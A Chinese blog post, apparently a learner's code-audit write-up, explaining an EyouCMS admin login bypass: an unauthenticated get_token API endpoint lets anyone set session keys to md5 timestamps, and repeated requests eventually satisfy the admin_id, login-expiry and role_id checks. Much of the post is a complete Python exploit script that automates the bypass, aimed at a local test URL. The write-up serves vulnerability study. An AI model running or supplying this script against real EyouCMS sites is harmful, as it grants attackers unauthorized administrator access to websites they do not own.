标签:EYouCMS 登录 admin self token session 后台 login id
- PHP代码审计,由于自己太菜啦,就先复现前辈们的文章来学习吧,参考下列文章。
- https://forum.butian.net/share/104
后台登录判断
- application/admin/controller/Base.php
- 跟进_initialize方法,定位到第57行
$admin_login_expire = session('admin_login_expire'); // 登录有效期web_login_expiretime
if (session('?admin_id') && getTime() - intval($admin_login_expire) < $web_login_expiretime) {
session('admin_login_expire', getTime()); // 登录有效期
$this->check_priv();//检查管理员菜单操作权限
}else{
/*自动退出*/
adminLog('访问后台');
// 进入后台
}
- 这里获取session,有两个要求
session('?admin_id')这里要求admin_id有值即可,YouDianCMS里面是一样的。然后getTime() - intval($admin_login_expire)这里需要获取当前时间戳-获取admin_login_expire<3600.因此这里获取的session是一个很大的数字。 - 再向下走跟进check_priv方法,当前文件第98行。
if (0 >= intval(session('admin_info.role_id'))) {
//超级管理员无需验证
return true;
- 发现这里只需要获取的session小于等于0即可。
- 总结需要满足以下条件。
admin_id有值getTime() - intval($admin_login_expire)<3600intval(admin_info.role_id)=<0
任意session设置
- application/api/controller/Ajax.php
public function get_token($name = '__token__')
{
if (IS_AJAX) {
echo $this->request->token($name);
exit;
} else {
abort(404);
}
}
- 发现这里没做鉴权,我们能直接访问,同时参数可控,继续跟进token方法。
public function token($name = '__token__', $type = 'md5')
{
$type = is_callable($type) ? $type : 'md5';
$token = call_user_func($type, $_SERVER['REQUEST_TIME_FLOAT']);
if ($this->isAjax()) {
header($name . ': ' . $token);
}
Session::set($name, $token);
return $token;
}
- 发现这里的session设置的键名,我么能够控制,值为MD5加密的时间戳。
- 上面获取的session有两个都转换成了整数,因为MD5加密的原因,我们因此可能遇见的字符开头为数字字符都有可能,因此需要一直请求,直到满足我们的条件为止。
Script
- 因为时间戳MD5加密的原因,导致可能要等很久才能找到我们需要的session。
from time import time,sleep
import requests
import sys
class EyouCMS:
def __init__(self,URL):
self.Req = requests.session()
self.URL = URL
self.SleepTime = 0.5
self.AdminURL = 'login.php?m=admin&c=Admin&a=admin_edit&id=1&lang=cn'
self.Payload = 'index.php/?m=api&c=ajax&a=get_token&name='
self.admin_id = 'admin_id'
self.admin_login_expire = 'admin_login_expire'
self.admin_info_role_id = 'admin_info.role_id'
self.Headers = {
'x-requested-with': 'XMLHttpRequest',
}
def Banner(self):
print("-"*10 + "后台登录绕过" + "-"*10)
def change(self,string):
temp = ''
for n, s in enumerate(string):
if n == 0:
if s.isalpha():
return '0'
break
if s.isdigit():
temp += str(s)
else:
if s.isalpha():
break
return temp
def SetID(self):
res = self.Req.get(self.URL + self.Payload + self.admin_id, headers=self.Headers)
print("admin_id[+]:\t\t\t\t\t" + res.text)
if 'Set-cookie' in res.headers:
print(res.headers['set-cookie'])
if res.status_code != 200:
sys.exit("Api模块请求404")
# print(res.headers)
def SetExpire(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_login_expire, headers=self.Headers)
# print(res.text,end='\t\t\t\t')
# print(self.change(res.text))
if(time()-int(self.change(res.text),10)<3600):
print("admin_login_expire[+]:\t\t\t" + res.text)
# print(res.headers)
break
sleep(self.SleepTime)
def SetRoleID(self):
while True:
res = self.Req.get(self.URL + self.Payload + self.admin_info_role_id, headers=self.Headers)
if(int(self.change(res.text),10)<=0):
print("admin_info.rele_id[+]:\t\t\t" + res.text)
break
sleep(self.SleepTime)
def CheckLogin(self):
res = self.Req.get(self.URL + self.AdminURL, headers=self.Headers)
res.encoding = res.apparent_encoding
if '更换头像' in res.text:
print("OK")
def run(self):
self.SetID()
self.SetExpire()
self.SetRoleID()
self.CheckLogin()
if __name__ == '__main__':
Start = time()
URL = 'http://127.0.0.1/eyoucms/'
e = EyouCMS(URL)
e.run()
End = time()
print(End-Start)
- 最后跑出来cookie,替换后即可成功登录后台。
标签:EYouCMS,登录,admin,self,token,session,后台,login,id 来源: https://www.cnblogs.com/Pan3a/p/14880225.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。